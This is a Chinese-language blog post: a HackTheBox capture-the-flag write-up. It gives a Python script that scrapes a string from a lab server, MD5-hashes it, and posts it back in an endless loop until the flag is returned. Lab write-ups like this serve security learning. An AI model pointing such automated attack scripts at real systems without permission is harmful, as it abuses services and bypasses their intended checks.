标签 HackTheBox 下的文章

知识点

  • 竞争条件

开工

进入到页面后提示需要将当前所给的字符串MD5加密后传输

尝试手动提交发现出不了结果,这里就可以考虑使用Python脚本进行传输

import requests
from hashlib import md5
import re



def encrypt(a):
    m = md5()
    m.update(a.encode('utf-8'))
    enc_a = m.hexdigest()
    data = {
        "hash":enc_a
    }
    return data

def find(url):
    res = requests.get(url).text
    pattern = re.compile(r'<h3 align=\'center\'>(.+?)</h3>')
    return pattern.findall(res)[0]

def find_txt(txt):

    pattern = re.compile(r'<h3 align=\'center\'>(.+?)</h3>')
    return pattern.findall(txt)[0]

def find_flag(txt):
    pattern = re.compile(r'<p align=\'center\'>(.+?)</p><center>')
    return pattern.findall(txt)[0]

def send(url):
    data = encrypt(find(url))

    res = requests.post(url=url,data=data,headers=headers).text

    data1 = encrypt(find_txt(res))
    
    res1 = requests.post(url=url,data=data1,headers=headers).text
    print(find_flag(res1))


if __name__ == '__main__':
    
    url = "http://46.101.74.114:32141/"
    headers = {
        'POST': '/ HTTP/1.1',
        'Content-Length': '37',
        'Cache-Control': 'max-age=0',
        'Upgrade-Insecure-Requests': '1',
        'Origin': url,
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Referer': 'http://46.101.74.114:32141/',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cookie': 'PHPSESSID=itc987r7eesb6cg623hhc0ut35',
        'Connection': 'close'
    }
    while 1:
        send(url)


在特定情况下,如时间,就可以拿到flag